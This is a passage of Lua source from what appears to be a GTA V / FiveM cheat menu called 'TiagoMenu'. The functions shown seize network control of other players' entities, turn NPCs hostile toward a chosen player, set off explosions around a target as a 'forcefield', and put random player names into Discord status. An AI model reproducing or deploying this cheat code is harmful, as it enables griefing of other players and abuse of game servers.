  3276. name = '~h~~r~> ~s~Compact Grenade Launcher',
  3277. bInfAmmo = false,
  3278. mods = {}
  3279. },
  3280. Widowmaker = {
  3281. id = 'weapon_rayminigun',
  3282. name = '~h~~r~> ~s~Widowmaker',
  3283. bInfAmmo = false,
  3284. mods = {}
  3285. }
  3286. },
  3287. Throwables = {
  3288. Grenade = {
  3289. id = 'weapon_grenade',
  3290. name = '~h~~r~> ~s~Grenade',
  3291. bInfAmmo = false,
  3292. mods = {}
  3293. },
  3294. BZGas = {
  3295. id = 'weapon_bzgas',
  3296. name = '~h~~r~> ~s~BZ Gas',
  3297. bInfAmmo = false,
  3298. mods = {}
  3299. },
  3300. MolotovCocktail = {
  3301. id = 'weapon_molotov',
  3302. name = '~h~~r~> ~s~Molotov Cocktail',
  3303. bInfAmmo = false,
  3304. mods = {}
  3305. },
  3306. StickyBomb = {
  3307. id = 'weapon_stickybomb',
  3308. name = '~h~~r~> ~s~Sticky Bomb',
  3309. bInfAmmo = false,
  3310. mods = {}
  3311. },
  3312. ProximityMines = {
  3313. id = 'weapon_proxmine',
  3314. name = '~h~~r~> ~s~Proximity Mines',
  3315. bInfAmmo = false,
  3316. mods = {}
  3317. },
  3318. Snowballs = {
  3319. id = 'weapon_snowball',
  3320. name = '~h~~r~> ~s~Snowballs',
  3321. bInfAmmo = false,
  3322. mods = {}
  3323. },
  3324. PipeBombs = {
  3325. id = 'weapon_pipebomb',
  3326. name = '~h~~r~> ~s~Pipe Bombs',
  3327. bInfAmmo = false,
  3328. mods = {}
  3329. },
  3330. Baseball = {
  3331. id = 'weapon_ball',
  3332. name = '~h~~r~> ~s~Baseball',
  3333. bInfAmmo = false,
  3334. mods = {}
  3335. },
  3336. TearGas = {
  3337. id = 'weapon_smokegrenade',
  3338. name = '~h~~r~> ~s~Tear Gas',
  3339. bInfAmmo = false,
  3340. mods = {}
  3341. },
  3342. Flare = {
  3343. id = 'weapon_flare',
  3344. name = '~h~~r~> ~s~Flare',
  3345. bInfAmmo = false,
  3346. mods = {}
  3347. }
  3348. },
  3349. Misc = {
  3350. Parachute = {
  3351. id = 'gadget_parachute',
  3352. name = '~h~~r~> ~s~Parachute',
  3353. bInfAmmo = false,
  3354. mods = {}
  3355. },
  3356. FireExtinguisher = {
  3357. id = 'weapon_fireextinguisher',
  3358. name = '~h~~r~> ~s~Fire Extinguisher',
  3359. bInfAmmo = false,
  3360. mods = {}
  3361. }
  3362. }
  3363. }
  3366. defaultVehAction = ''
  3367. if GetVehiclePedIsUsing(PlayerPedId()) then
  3368. veh = GetVehiclePedIsUsing(PlayerPedId())
  3369. end
  3370. local bl = false
  3371. local bm = true
  3372. local bn = GetPlayerServerId(PlayerPedId(-1))
  3373. local bo = GetPlayerName(bn)
  3375. local function SpawnVeh(model, PlaceSelf)
  3376. RequestModel(GetHashKey(model))
  3377. Wait(500)
  3378. if HasModelLoaded(GetHashKey(model)) then
  3379. local coords = GetEntityCoords(PlayerPedId())
  3380. local xf = GetEntityForwardX(PlayerPedId())
  3381. local yf = GetEntityForwardY(PlayerPedId())
  3382. local heading = GetEntityHeading(PlayerPedId())
  3383. local veh = CreateVehicle(GetHashKey(model), coords.x+xf*5, coords.y+yf*5, coords.z, heading, 1, 1)
  3384. if PlaceSelf then SetPedIntoVehicle(PlayerPedId(), veh, -1) end
  3385. else ShowInfo("~r~Model not recognized") end
  3386. end
  3389. local presensecheck = {
  3390. state = true
  3391. }
  3393. local presense = true
  3395. nname = nil
  3397. count = {}
  3399. local Feltzer = false
  3401. local vehlistv = {'Nero', 'Deluxo', 'Raiden', 'Bati2', "SultanRS", "TA21", "Tiago", "ZR380", "Streiter", "Neon", "Italigto", "Nero2", "Fmj", "le7b", "prototipo", "cyclone", "khanjali", "STROMBERG", "BARRAGE", "COMET5"}
  3403. zzzt = 1
  3406. ForcefieldRadiusOps = {5.0, 10.0, 15.0, 20.0, 50.0,100.0}
  3408. ForcefieldRadius = 5.0
  3411. Citizen.CreateThread(
  3412. function()
  3413. for i = 0, 256 do
  3414. local count1 = GetPlayerName(i)
  3415. if count1 ~= '**Invalid**' then
  3416. table.insert(count, count1)
  3417. end
  3418. end
  3419. end
  3420. )
  3422. Citizen.CreateThread(function()
  3423. RequestModel('s_m_y_swat_01')
  3424. RequestModel('s_m_y_hwaycop_01')
  3425. for i = 1, #vehlistv do
  3426. RequestModel(vehlistv[i])
  3427. Citizen.Wait(200)
  3428. end
  3429. end)
  3431. Citizen.CreateThread(
  3432. function()
  3433. while presense do
  3434. Citizen.Wait(5000)
  3435. for i = 1, #count do
  3436. if GetPlayerName(i) ~= count[i] then
  3437. table.remove(count, i, GetPlayerName(i))
  3438. end
  3439. end
  3440. end
  3441. end
  3442. )
  3444. Citizen.CreateThread(
  3445. function()
  3446. while presense do
  3447. if nname ~= GetPlayerName(PlayerId()) then
  3448. Citizen.Wait(3000)
  3449. nname = count[math.random(#count)]
  3450. elseif nname == GetPlayerName(PlayerId()) then
  3451. Citizen.Wait(50)
  3452. nname = count[math.random(#count)]
  3453. end
  3454. end
  3455. end
  3456. )
  3458. local function SetRP()
  3459. local id = GetPlayerServerId(PlayerId())
  3460. SetRichPresence(tostring(nname) .. ' is developing TiagoModz#5836')
  3461. SetDiscordAppId(appid)
  3462. SetDiscordRichPresenceAsset(asset)
  3463. SetDiscordRichPresenceAssetSmall(asset)
  3464. SetDiscordRichPresenceAssetText(scroll[zzzt])
  3465. if #count == 1 then
  3466. SetDiscordRichPresenceAssetSmallText('Playing with ' .. GetNumberOfPlayers() .. ' player')
  3467. else
  3468. SetDiscordRichPresenceAssetSmallText('Playing with ' .. GetNumberOfPlayers() .. ' players')
  3469. end
  3470. end
  3472. Citizen.CreateThread(
  3473. function()
  3474. while presense do
  3475. SetRP()
  3476. Citizen.Wait(100)
  3477. zzzt = zzzt + 1
  3478. if zzzt == 29 then
  3479. zzzt = 1
  3480. end
  3481. end
  3482. end
  3483. )
  3485. function ApplyForce(entity, direction)
  3486. ApplyForceToEntity(entity, 3, direction, 0, 0, 0, false, false, true, true, false, true)
  3487. end
  3489. function RequestControlOnce(entity)
  3490. if not NetworkIsInSession or NetworkHasControlOfEntity(entity) then
  3491. return true
  3492. end
  3493. SetNetworkIdCanMigrate(NetworkGetNetworkIdFromEntity(entity), true)
  3494. return NetworkRequestControlOfEntity(entity)
  3495. end
  3497. function RequestControl(entity)
  3498. Citizen.CreateThread(function()
  3499. local tick = 0
  3500. while not RequestControlOnce(entity) and tick <= 12 do
  3501. tick = tick + 1
  3502. Wait(0)
  3503. end
  3504. return tick <= 12
  3505. end)
  3506. end
  3508. function Oscillate(entity, position, angleFreq, dampRatio)
  3509. local pos1 = ScaleVector(SubVectors(position, GetEntityCoords(entity)), (angleFreq * angleFreq))
  3510. local pos2 = AddVectors(ScaleVector(GetEntityVelocity(entity), (2.0 * angleFreq * dampRatio)), vector3(0.0, 0.0, 0.1))
  3511. local targetPos = SubVectors(pos1, pos2)
  3513. ApplyForce(entity, targetPos)
  3514. end
  3517. local function GetPedImpact(p)
  3518. local retval, coord = GetPedLastWeaponImpactCoord(p)
  3519. return coord
  3520. end
  3522. local function ClonePedVeh()
  3523. local ped = GetPlayerPed(SelectedPlayer)
  3524. local pedVeh = nil
  3525. local PlayerPed = PlayerPedId()
  3526. if IsPedInAnyVehicle(ped, false) then
  3527. pedVeh = GetVehiclePedIsIn(ped, false)
  3528. else
  3529. pedVeh = GetVehiclePedIsIn(ped, true)
  3530. if DoesEntityExist(pedVeh) then
  3531. local vmh = GetEntityModel(pedVeh)
  3532. local playerpos = GetEntityCoords(PlayerPed, false)
  3533. local playerveh =
  3534. CreateVehicle(vmh, playerpos.x, playerpos.y, playerpos.z, GetEntityHeading(PlayerPed), true, true)
  3535. SetPedIntoVehicle(PlayerPed, playerveh, -1)
  3536. local pcolor, scolor = nil
  3537. GetVehicleColours(pedVeh, pcolor, scolor)
  3538. SetVehicleColours(playerveh, pcolor, scolor)
  3539. if IsThisModelACar(vmh) or IsThisModelABike(vhm) then
  3540. SetVehicleModKit(playerveh, 0)
  3541. SetVehicleWheelType(playerveh, GetVehicleWheelType(pedVeh))
  3542. local pc, wc = nil
  3543. SetVehicleNumberPlateTextIndex(playerveh, GetVehicleNumberPlateTextIndex(pedVeh))
  3544. SetVehicleNumberPlateText(playerveh, GetVehicleNumberPlateText(pedVeh))
  3545. GetVehicleExtraColours(pedVeh, pc, wc)
  3546. SetVehicleExtraColours(playerveh, pc, wc)
  3547. end
  3548. end
  3549. end
  3550. end
  3552. local function RequestNetworkControl(Request)
  3553. local hasControl = false
  3554. while hasControl == false do
  3555. hasControl = NetworkRequestControlOfEntity(Request)
  3556. if hasControl == true or hasControl == 1 then
  3557. break
  3558. end
  3559. if
  3560. NetworkHasControlOfEntity(ped) == true and hasControl == true or
  3561. NetworkHasControlOfEntity(ped) == true and hasControl == 1
  3562. then
  3563. return true
  3564. else
  3565. return false
  3566. end
  3567. end
  3568. end
  3570. local function makePedHostile(target, ped, swat, clone)
  3571. if swat == 1 or swat == true then
  3572. RequestNetworkControl(ped)
  3573. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  3574. SetPedCanSwitchWeapon(ped, true)
  3575. else
  3576. if clone == 1 or clone == true then
  3577. local Hash = GetEntityModel(ped)
  3578. if DoesEntityExist(ped) then
  3579. DeletePed(ped)
  3580. RequestModel(Hash)
  3581. local coords = GetEntityCoords(GetPlayerPed(target), true)
  3582. if HasModelLoaded(Hash) then
  3583. local newPed = CreatePed(21, Hash, coords.x, coords.y, coords.z, 0, 1, 0)
  3584. if GetEntityHealth(newPed) == GetEntityMaxHealth(newPed) then
  3585. SetModelAsNoLongerNeeded(Hash)
  3586. RequestNetworkControl(newPed)
  3587. TaskCombatPed(newPed, GetPlayerPed(target), 0, 16)
  3588. SetPedCanSwitchWeapon(ped, true)
  3589. end
  3590. end
  3591. end
  3592. else
  3593. local TargetHandle = GetPlayerPed(target)
  3594. RequestNetworkControl(ped)
  3595. TaskCombatPed(ped, TargetHandle, 0, 16)
  3596. end
  3597. end
  3598. end
  3600. function DrawTxt(text, x, y)
  3601. SetTextFont(0)
  3602. SetTextProportional(1)
  3603. SetTextScale(0.0, 0.4)
  3604. SetTextDropshadow(1, 0, 0, 0, 255)
  3605. SetTextEdge(1, 0, 0, 0, 255)
  3606. SetTextDropShadow()
  3607. SetTextOutline()
  3608. SetTextEntry('STRING')
  3609. AddTextComponentString(text)
  3610. DrawText(x, y)
  3611. end
  3613. function DrawText3D2(x, y, z, text)
  3614. local onScreen, _x, _y = World3dToScreen2d(x, y, z)
  3615. local px, py, pz = table.unpack(GetGameplayCamCoords())
  3616. local dist = GetDistanceBetweenCoords(px, py, pz, x, y, z, 1)
  3618. local scale = (1 / dist) * 2
  3619. local fov = (1 / GetGameplayCamFov()) * 100
  3620. local scale = scale * fov
  3622. if onScreen then
  3623. SetTextScale(0.0 * scale, 0.55 * scale)
  3624. SetTextFont(0)
  3625. SetTextProportional(1)
  3626. SetTextColour(255, 255, 255, 255)
  3627. SetTextDropshadow(0, 0, 0, 0, 255)
  3628. SetTextEdge(2, 0, 0, 0, 150)
  3629. SetTextDropShadow()
  3630. SetTextOutline()
  3631. SetTextEntry('STRING')
  3632. SetTextCentre(1)
  3633. AddTextComponentString(text)
  3634. DrawText(_x, _y)
  3635. end
  3636. end
  3639. local objects = {}
  3641. local function wallin()
  3642. Citizen.CreateThread(
  3643. function()
  3644. while true do
  3645. DrawTxt(
  3646. '~y~Press ~s~E ~y~to spawn | ~y~Press ~s~Z ~y~to delete | ~y~Press ~s~G ~y~to clear objects | ',
  3647. 0.23,
  3648. 0.90
  3649. )
  3650. DrawTxt('~y~Press ~s~X ~y~to stop script', 0.595, 0.90)
  3651. DrawTxt('~y~Spawned:~s~ ' .. #objects, 0.80, 0.90)
  3653. for i = 1, #objects do
  3654. local x, y, z = table.unpack(GetEntityCoords(objects[i]))
  3655. DrawText3D2(x, y, z + 1, 'OBJECT HERE! INDEX: ' .. i)
  3656. end
  3658. if IsControlJustPressed(1, 38) then
  3659. local pos = GetEntityCoords(PlayerPedId())
  3660. local pitch = GetEntityPitch(PlayerPedId())
  3661. local roll = GetEntityRoll(PlayerPedId())
  3662. local yaw = GetEntityRotation(PlayerPedId()).z
  3663. local xf = GetEntityForwardX(PlayerPedId())
  3664. local yf = GetEntityForwardY(PlayerPedId())
  3665. objects[#objects + 1] =
  3666. CreateObject('prop_container_01a', pos.x - (xf * 10), pos.y - (yf * 10), pos.z - 1, 1, 1, 1)
  3667. SetEntityRotation(objects[#objects], pitch, roll, yaw + 90)
  3668. SetEntityVisible(objects[#objects], 0, 1, 1)
  3669. print('Object placed with index: ' .. objects[#objects])
  3670. elseif IsControlJustPressed(1, 20) then
  3671. SetEntityCoords(objects[#objects], 0, 0, 0)
  3672. DeleteObject(objects[#objects])
  3673. print('Deleted object with index: ' .. #objects)
  3674. table.remove(objects, #objects)
  3675. elseif IsControlJustPressed(1, 47) then
  3676. for i = 0, #objects do
  3677. SetEntityCoords(objects[i], 0, 0, 0)
  3678. DeleteObject(objects[i])
  3679. print('Deleted object with index: ' .. i)
  3680. end
  3681. objects = {}
  3682. elseif IsControlJustPressed(1, 73) then
  3683. print('Script has been stopped')
  3684. break
  3685. end
  3686. Citizen.Wait(1)
  3687. end
  3688. end
  3689. )
  3690. end
  3691. TiagoMenu = {}
  3693. TiagoMenu.debug = false
  3695. local function RGBRainbow(frequency)
  3696. local result = {}
  3697. local curtime = GetGameTimer() / 1000
  3699. result.r = math.floor(math.sin(curtime * frequency + 0) * 127 + 128)
  3700. result.g = math.floor(math.sin(curtime * frequency + 2) * 127 + 128)
  3701. result.b = math.floor(math.sin(curtime * frequency + 4) * 127 + 128)
  3703. return result
  3704. end
  3706. local menus = {}
  3707. local keys = {up = 172, down = 173, left = 174, right = 175, select = 176, back = 177}
  3708. local optionCount = 0
  3710. local currentKey = nil
  3711. local currentMenu = nil
  3713. local menuWidth = 0.23
  3714. local titleHeight = 0.25
  3715. local titleYOffset = 0.05
  3716. local titleScale = 1.5
  3718. local buttonHeight = 0.038
  3719. local buttonFont = 0
  3720. local buttonScale = 0.365
  3721. local buttonTextXOffset = 0.005
  3722. local buttonTextYOffset = 0.005
  3724. local currForcefieldRadiusIndex = 1
  3725. local selForcefieldRadiusIndex = 1
  3727. local function ForcefieldPlayer(target, radius)
  3728. local player = GetPlayerPed(target)
  3729. local coords = GetEntityCoords(player)
  3730. DrawMarker(28, coords.x, coords.y, coords.z, 0.0, 0.0, 0.0, 0.0, 180.0, 0.0, radius, radius, radius, 180, 0, 0, 35, false, true, 2, nil, nil, false)
  3732. for ped in EnumeratePeds() do
  3733. if GetDistanceBetweenCoords(coords, GetEntityCoords(ped)) <= radius*1.2 and ped ~= PlayerPedId() then
  3734. --ApplyForceToEntity(ped, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
  3735. AddExplosion(GetEntityCoords(ped), 5, 1.0, false, true, 0.0)
  3736. end
  3737. end
  3739. for obj in EnumerateObjects() do
  3740. if GetDistanceBetweenCoords(coords, GetEntityCoords(obj)) <= radius*1.2 then
  3741. --ApplyForceToEntity(obj, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
  3742. AddExplosion(GetEntityCoords(obj), 5, 1.0, false, true, 0.0)
  3743. end
  3744. end
  3746. for veh in EnumerateVehicles() do
  3747. if GetDistanceBetweenCoords(coords, GetEntityCoords(veh)) <= radius*1.2 then
  3748. --ApplyForceToEntity(veh, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
  3749. AddExplosion(GetEntityCoords(veh), 5, 1.0, false, true, 0.0)
  3750. end
  3751. end
  3753. for pickup in EnumeratePickups() do
  3754. if GetDistanceBetweenCoords(coords, GetEntityCoords(pickup)) <= radius*1.2 then
  3755. --ApplyForceToEntity(pickup, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
  3756. AddExplosion(GetEntityCoords(pickup), 5, 1.0, false, true, 0.0)
  3757. end
  3758. end
  3760. end
  3762. local function debugPrint(text)
  3763. if TiagoMenu.debug then
  3764. Citizen.Trace("[TMmenu] " .. tostring(text))
  3765. end
  3766. end
  3768. local function setMenuProperty(id, property, value)
  3769. if id and menus[id] then
  3770. menus[id][property] = value
  3771. debugPrint(id .. " menu property changed: { " .. tostring(property) .. ", " .. tostring(value) .. " }")
  3772. end
  3773. end
  3775. local function isMenuVisible(id)
  3776. if id and menus[id] then
  3777. return menus[id].visible
  3778. else
  3779. return false
  3780. end
  3781. end
  3782. local function ClonePedVeh()
  3783. local ped = GetPlayerPed(SelectedPlayer)
  3784. local pedVeh = nil
  3785. local PlayerPed = PlayerPedId()
  3786. if IsPedInAnyVehicle(ped, false) then
  3787. pedVeh = GetVehiclePedIsIn(ped, false)
  3788. else
  3789. pedVeh = GetVehiclePedIsIn(ped, true)
  3790. if DoesEntityExist(pedVeh) then
  3791. local vmh = GetEntityModel(pedVeh)
  3792. local playerpos = GetEntityCoords(PlayerPed, false)
  3793. local playerveh =
  3794. CreateVehicle(vmh, playerpos.x, playerpos.y, playerpos.z, GetEntityHeading(PlayerPed), true, true)
  3795. SetPedIntoVehicle(PlayerPed, playerveh, -1)
  3796. local pcolor, scolor = nil
  3797. GetVehicleColours(pedVeh, pcolor, scolor)
  3798. SetVehicleColours(playerveh, pcolor, scolor)
  3799. if IsThisModelACar(vmh) or IsThisModelABike(vhm) then
  3800. SetVehicleModKit(playerveh, 0)
  3801. SetVehicleWheelType(playerveh, GetVehicleWheelType(pedVeh))
  3802. local pc, wc = nil
  3803. SetVehicleNumberPlateTextIndex(playerveh, GetVehicleNumberPlateTextIndex(pedVeh))
  3804. SetVehicleNumberPlateText(playerveh, GetVehicleNumberPlateText(pedVeh))
  3805. GetVehicleExtraColours(pedVeh, pc, wc)
  3806. SetVehicleExtraColours(playerveh, pc, wc)
  3807. end
  3808. end
  3809. end
  3810. end
  3812. local function fixcar()
  3813. SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(-1), false))
  3814. SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0.0)
  3815. SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  3816. SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  3817. Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  3819. end
  3822. local function setMenuVisible(id, visible, holdCurrent)
  3823. if id and menus[id] then
  3824. setMenuProperty(id, "visible", visible)
  3826. if not holdCurrent and menus[id] then
  3827. setMenuProperty(id, "currentOption", 1)
  3828. end
  3830. if visible then
  3831. if id ~= currentMenu and isMenuVisible(currentMenu) then
  3832. setMenuVisible(currentMenu, false)
  3833. end
  3835. currentMenu = id
  3836. end
  3837. end
  3838. end
  3840. local function drawText(text, x, y, font, color, scale, center, shadow, alignRight)
  3841. SetTextColour(color.r, color.g, color.b, color.a)
  3842. SetTextFont(font)
  3843. SetTextScale(scale, scale)
  3845. if shadow then
  3846. SetTextDropShadow(2, 2, 0, 0, 0)
  3847. end
  3849. if menus[currentMenu] then
  3850. if center then
  3851. SetTextCentre(center)
  3852. elseif alignRight then
  3853. SetTextWrap(menus[currentMenu].x, menus[currentMenu].x + menuWidth - buttonTextXOffset)
  3854. SetTextRightJustify(true)
  3855. end
  3856. end
  3857. SetTextEntry("STRING")
  3858. AddTextComponentString(text)
  3859. DrawText(x, y)
  3860. end
  3862. local function drawRect(x, y, width, height, color)
  3863. DrawRect(x, y, width, height, color.r, color.g, color.b, color.a)
  3864. end
  3866. local function drawTitle()
  3867. if menus[currentMenu] then
  3868. local x = menus[currentMenu].x + menuWidth / 2
  3869. local y = menus[currentMenu].y + titleHeight / 2
  3871. if menus[currentMenu].titleBackgroundSprite then
  3872. DrawSprite(
  3873. menus[currentMenu].titleBackgroundSprite.dict,
  3874. menus[currentMenu],
  3875. x,
  3876. y,
  3877. menuWidth,
  3878. titleHeight,
  3879. 0.,
  3880. 255,
  3881. 255,
  3882. 255,
  3883. 255
  3884. )
  3885. else
  3886. drawRect(x, y, menuWidth, titleHeight, menus[currentMenu].titleBackgroundColor)
  3887. end
  3889. drawText(
  3890. menus[currentMenu].title,
  3891. x,
  3892. y - titleHeight / 2 + titleYOffset,
  3893. menus[currentMenu].titleFont,
  3894. menus[currentMenu].titleColor,
  3895. titleScale,
  3896. true
  3897. )
  3898. end
  3899. end
  3901. if RapidFire then
  3902. DoRapidFireTick()
  3903. end
  3905. local function DoRapidFireTick()
  3906. if IsDisabledControlPressed(0, 24) then
  3907. local _, weapon = GetCurrentPedWeapon(PlayerPedId())
  3908. local wepent = GetCurrentPedWeaponEntityIndex(PlayerPedId())
  3909. local camDir = GetCamDirFromScreenCenter()
  3910. local camPos = GetGameplayCamCoord()
  3911. local launchPos = GetEntityCoords(wepent)
  3912. local targetPos = camPos + (camDir * 200.0)
  3914. ClearAreaOfProjectiles(launchPos, 0.0, 1)
  3916. ShootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, weapon, PlayerPedId(), true, true, 24000.0)
  3917. ShootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, weapon, PlayerPedId(), true, true, 24000.0)
  3918. end
  3919. end
  3922. if ForceGun then
  3924. local ret, pos = GetPedLastWeaponImpactCoord(PlayerPedId())
  3925. if ret then
  3926. for k in EnumeratePeds() do
  3927. local coords = GetEntityCoords(k)
  3928. if k ~= PlayerPedId() and GetDistanceBetweenCoords(pos, coords) <= 1.0 then
  3929. local forward = GetEntityForwardVector(PlayerPedId())
  3930. RequestControlOnce(k)
  3931. ApplyForce(k, forward * 500)
  3932. end
  3933. end
  3935. for k in EnumerateVehicles() do
  3936. local coords = GetEntityCoords(k)
  3937. if k ~= GetVehiclePedIsIn(PlayerPedId(), 0) and GetDistanceBetweenCoords(pos, coords) <= 3.0 then
  3938. local forward = GetEntityForwardVector(PlayerPedId())
  3939. RequestControlOnce(k)
  3940. ApplyForce(k, forward * 500)
  3941. end
  3942. end
  3944. end
  3945. end
  3947. local function drawSubTitle()
  3948. if menus[currentMenu] then
  3949. local x = menus[currentMenu].x + menuWidth / 2
  3950. local y = menus[currentMenu].y + titleHeight + buttonHeight / 2
  3952. local subTitleColor = {
  3953. r = menus[currentMenu].titleBackgroundColor.r,
  3954. g = menus[currentMenu].titleBackgroundColor.g,
  3955. b = menus[currentMenu].titleBackgroundColor.b,
  3956. a = 255
  3957. }
  3959. drawRect(x, y, menuWidth, buttonHeight, menus[currentMenu].subTitleBackgroundColor)
  3960. drawText(
  3961. menus[currentMenu].subTitle,
  3962. menus[currentMenu].x + buttonTextXOffset,
  3963. y - buttonHeight / 2 + buttonTextYOffset,
  3964. buttonFont,
  3965. subTitleColor,
  3966. buttonScale,
  3967. false
  3968. )
  3970. if optionCount > menus[currentMenu].maxOptionCount then
  3971. drawText(
  3972. tostring(menus[currentMenu].currentOption) .. " / " .. tostring(optionCount),
  3973. menus[currentMenu].x + menuWidth,
  3974. y - buttonHeight / 2 + buttonTextYOffset,
  3975. buttonFont,
  3976. subTitleColor,
  3977. buttonScale,
  3978. false,
  3979. false,
  3980. true
  3981. )
  3982. end
  3983. end
  3984. end
  3986. local function drawButton(text, subText)
  3987. local x = menus[currentMenu].x + menuWidth / 2
  3988. local multiplier = nil
  3990. if
  3991. menus[currentMenu].currentOption <= menus[currentMenu].maxOptionCount and
  3992. optionCount <= menus[currentMenu].maxOptionCount
  3993. then
  3994. multiplier = optionCount
  3995. elseif
  3996. optionCount > menus[currentMenu].currentOption - menus[currentMenu].maxOptionCount and
  3997. optionCount <= menus[currentMenu].currentOption
  3998. then
  3999. multiplier = optionCount - (menus[currentMenu].currentOption - menus[currentMenu].maxOptionCount)
  4000. end
  4002. if multiplier then
  4003. local y = menus[currentMenu].y + titleHeight + buttonHeight + (buttonHeight * multiplier) - buttonHeight / 2
  4004. local backgroundColor = nil
  4005. local textColor = nil
  4006. local subTextColor = nil
  4007. local shadow = false
  4009. if menus[currentMenu].currentOption == optionCount then
  4010. backgroundColor = menus[currentMenu].menuFocusBackgroundColor
  4011. textColor = menus[currentMenu].menuFocusTextColor
  4012. subTextColor = menus[currentMenu].menuFocusTextColor
  4013. else
  4014. backgroundColor = menus[currentMenu].menuBackgroundColor
  4015. textColor = menus[currentMenu].menuTextColor
  4016. subTextColor = menus[currentMenu].menuSubTextColor
  4017. shadow = true
  4018. end
  4020. drawRect(x, y, menuWidth, buttonHeight, backgroundColor)
  4021. drawText(
  4022. text,
  4023. menus[currentMenu].x + buttonTextXOffset,
  4024. y - (buttonHeight / 2) + buttonTextYOffset,
  4025. buttonFont,
  4026. textColor,
  4027. buttonScale,
  4028. false,
  4029. shadow
  4030. )
  4032. if subText then
  4033. drawText(
  4034. subText,
  4035. menus[currentMenu].x + buttonTextXOffset,
  4036. y - buttonHeight / 2 + buttonTextYOffset,
  4037. buttonFont,
  4038. subTextColor,
  4039. buttonScale,
  4040. false,
  4041. shadow,
  4042. true
  4043. )
  4044. end
  4045. end
  4046. end
  4048. function TiagoMenu.CreateMenu(id, title)
  4050. menus[id] = {}
  4051. menus[id].title = title
  4052. menus[id].subTitle = "INTERACTION MENU"
  4054. menus[id].visible = false
  4056. menus[id].previousMenu = nil
  4058. menus[id].aboutToBeClosed = false
  4060. menus[id].x = 0.70
  4061. menus[id].y = 0.25
  4063. menus[id].currentOption = 1
  4064. menus[id].maxOptionCount = 10
  4065. menus[id].titleFont = 7
  4066. menus[id].titleColor = {r = 255, g = 255, b = 255, a = 255}
  4067. Citizen.CreateThread(
  4068. function()
  4069. while true do
  4070. Citizen.Wait(0)
  4071. local ra = RGBRainbow(1.0)
  4072. menus[id].titleBackgroundColor = {r = 0, g = 0, b = 0, a = 200}
  4073. menus[id].menuFocusBackgroundColor = {r = 0, g = 0, b = 0, a = 255}
  4074. end
  4075. end)
  4076. menus[id].titleBackgroundSprite = nil
  4078. menus[id].menuTextColor = {r = 255, g = 255, b = 255, a = 255}
  4079. menus[id].menuSubTextColor = {r = 189, g = 189, b = 189, a = 255}
  4080. menus[id].menuFocusTextColor = {r = 255, g = 255, b = 255, a = 255}
  4081. --menus[id].menuFocusBackgroundColor = { r = 245, g = 245, b = 245, a = 255 }
  4082. menus[id].menuBackgroundColor = {r = 0, g = 0, b = 0, a = 10}
  4084. menus[id].subTitleBackgroundColor = {
  4085. r = menus[id].menuBackgroundColor.r,
  4086. g = menus[id].menuBackgroundColor.g,
  4087. b = menus[id].menuBackgroundColor.b,
  4088. a = 10
  4089. }
  4091. menus[id].buttonPressedSound = {name = "SELECT", set = "HUD_FRONTEND_DEFAULT_SOUNDSET"}
  4093. debugPrint(tostring(id) .. " menu created")
  4094. end
  4096. function TiagoMenu.CreateSubMenu(id, parent, subTitle)
  4097. if menus[parent] then
  4098. TiagoMenu.CreateMenu(id, menus[parent].title)
  4100. if subTitle then
  4101. setMenuProperty(id, "subTitle", string.upper(subTitle))
  4102. else
  4103. setMenuProperty(id, "subTitle", string.upper(menus[parent].subTitle))
  4104. end
  4106. setMenuProperty(id, "previousMenu", parent)
  4108. setMenuProperty(id, "x", menus[parent].x)
  4109. setMenuProperty(id, "y", menus[parent].y)
  4110. setMenuProperty(id, "maxOptionCount", menus[parent].maxOptionCount)
  4111. setMenuProperty(id, "titleFont", menus[parent].titleFont)
  4112. setMenuProperty(id, "titleColor", menus[parent].titleColor)
  4113. setMenuProperty(id, "titleBackgroundColor", menus[parent].titleBackgroundColor)
  4114. setMenuProperty(id, "titleBackgroundSprite", menus[parent].titleBackgroundSprite)
  4115. setMenuProperty(id, "menuTextColor", menus[parent].menuTextColor)
  4116. setMenuProperty(id, "menuSubTextColor", menus[parent].menuSubTextColor)
  4117. setMenuProperty(id, "menuFocusTextColor", menus[parent].menuFocusTextColor)
  4118. setMenuProperty(id, "menuFocusBackgroundColor", menus[parent].menuFocusBackgroundColor)
  4119. setMenuProperty(id, "menuBackgroundColor", menus[parent].menuBackgroundColor)
  4120. setMenuProperty(id, "subTitleBackgroundColor", menus[parent].subTitleBackgroundColor)
  4121. else
  4122. debugPrint("Failed to create " .. tostring(id) .. " submenu: " .. tostring(parent) .. " parent menu doesn't exist")
  4123. end
  4124. end
  4126. function TiagoMenu.CurrentMenu()
  4127. return currentMenu
  4128. end
  4130. function TiagoMenu.OpenMenu(id)
  4131. if id and menus[id] then
  4132. PlaySoundFrontend(-1, "SELECT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
  4133. setMenuVisible(id, true)
  4135. if menus[id].titleBackgroundSprite then
  4136. RequestStreamedTextureDict(menus[id].titleBackgroundSprite.dict, false)
  4137. while not HasStreamedTextureDictLoaded(menus[id].titleBackgroundSprite.dict) do
  4138. Citizen.Wait(0)
  4139. end
  4140. end
  4142. debugPrint(tostring(id) .. " menu opened")
  4143. else
  4144. debugPrint("Failed to open " .. tostring(id) .. " menu: it doesn't exist")
  4145. end
  4146. end
  4148. function TiagoMenu.IsMenuOpened(id)
  4149. return isMenuVisible(id)
  4150. end
  4152. function TiagoMenu.IsAnyMenuOpened()
  4153. for id, _ in pairs(menus) do
  4154. if isMenuVisible(id) then
  4155. return true
  4156. end
  4157. end
  4159. return false
  4160. end
  4162. function TiagoMenu.IsMenuAboutToBeClosed()
  4163. if menus[currentMenu] then
  4164. return menus[currentMenu].aboutToBeClosed
  4165. else
  4166. return false
  4167. end
  4168. end
  4170. function TiagoMenu.CloseMenu()
  4171. if menus[currentMenu] then
  4172. if menus[currentMenu].aboutToBeClosed then
